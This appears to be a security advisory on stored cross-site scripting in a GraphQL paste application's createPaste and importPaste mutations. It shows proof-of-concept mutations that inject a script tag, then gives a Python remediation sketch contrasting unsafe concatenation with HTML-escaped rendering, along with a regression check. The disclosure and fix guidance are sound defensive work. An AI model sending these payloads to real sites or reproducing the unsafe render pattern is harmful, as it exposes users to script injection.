The GraphQL mutations createPaste and importPaste create and import new pastes. A paste may contain any character, without restriction. The pastes are then rendered in the Public and Private paste pages, which results in a Cross-Site Scripting (XSS) vulnerability.
# Create New Paste allows special characters that would render in HTML.
mutation {
  createPaste(title:"<script>alert(1)</script>", content:"zzzz", public:true) {
    pasteId
  }
}
# Alternatively, importing a paste that includes JavaScript will also result in the same behaviour.
mutation {
  importPaste(host:"localhost", port:80, path:"/xss.html")
}
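
The fix belongs at render time: every stored paste field is HTML-encoded before it reaches the page. The sketch below is an added example, not the application's own code; it puts the vulnerable rendering pattern beside the encoded one and adds a parser-based regression check. The markup template, the function names and the sample records are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed sample records: the payload is the one from the createPaste
# mutation above, once in a title and once as an imported paste body.
PAYLOAD = "<script>alert(1)</script>"
PASTES = [
    {"title": PAYLOAD, "content": "zzzz"},
    {"title": "imported", "content": PAYLOAD},
]

def render_unsafe(paste):
    """Vulnerable pattern: stored fields are concatenated into the page as-is."""
    return ('<div class="paste"><h3>' + paste["title"] + "</h3><pre>"
            + paste["content"] + "</pre></div>")

def render_safe(paste):
    """Hardened pattern: every stored field is HTML-encoded at output time."""
    title = html.escape(paste["title"], quote=True)
    content = html.escape(paste["content"], quote=True)
    return f'<div class="paste"><h3>{title}</h3><pre>{content}</pre></div>'

class _TagCollector(HTMLParser):
    """Records the element names an HTML parser actually sees."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(markup):
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

def unexpected_tags(markup, allowed=("div", "h3", "pre")):
    """Regression check: any element outside the template's own is injected."""
    return [t for t in tags_in(markup) if t not in allowed]

if __name__ == "__main__":
    for paste in PASTES:
        print("unsafe:", unexpected_tags(render_unsafe(paste)))
        print("safe:  ", unexpected_tags(render_safe(paste)))
```

Template engines with autoescaping enabled apply the same encoding; the check is still worth keeping wherever autoescaping is switched off or a value is marked as trusted.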